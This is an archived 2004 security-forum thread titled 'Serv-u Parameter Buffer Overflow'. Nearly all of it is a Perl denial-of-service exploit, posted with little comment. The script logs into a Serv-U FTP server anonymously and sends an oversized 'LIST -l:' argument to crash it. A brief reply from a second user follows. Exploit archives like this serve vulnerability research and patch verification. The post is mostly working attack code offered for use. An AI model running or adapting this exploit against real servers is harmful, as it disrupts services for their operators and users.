Serv-u Parameter Buffer Overflow

Full Version: Serv-u Parameter Buffer Overflow

GovernmentSecurity.org > The Archives > Exploit Articles

Yorn

May 4 2004, 08:09 PM

The following is a PERL script to "Denial of Service" Serv-U:
courtesy of Aviram Jenik [aviram@BEYONDSECURITY.COM]

CODE

#!/usr/bin/perl

use IO::Socket;

$host = "192.168.1.243";

$remote = IO::Socket::INET->new ( Proto => "tcp",
PeerAddr => $host,
PeerPort => "2116",
);

unless ($remote) { die "cannot connect to ftp daemon on $host" }

print "connected\n";
while (<$remote>)
{
print $_;
if (/220 /)
{
last;
}
}

$remote->autoflush(1);

my $ftp = "USER anonymous\r\n";

print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
print $_;
if (/331 /)
{
last;
}
}

$ftp = join("", "PASS ", "a\@b.com", "\r\n");
print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
print $_;
if (/230 /)
{
last;
}
}

my $ftp = join ("", "LIST -l:", "A"x(134), "\r\n");

print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
print $_;
if (/250 Done/)
{
last;
}
}

close $remote;

BuzzDee

May 5 2004, 07:55 AM

another servu vuln? lol

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.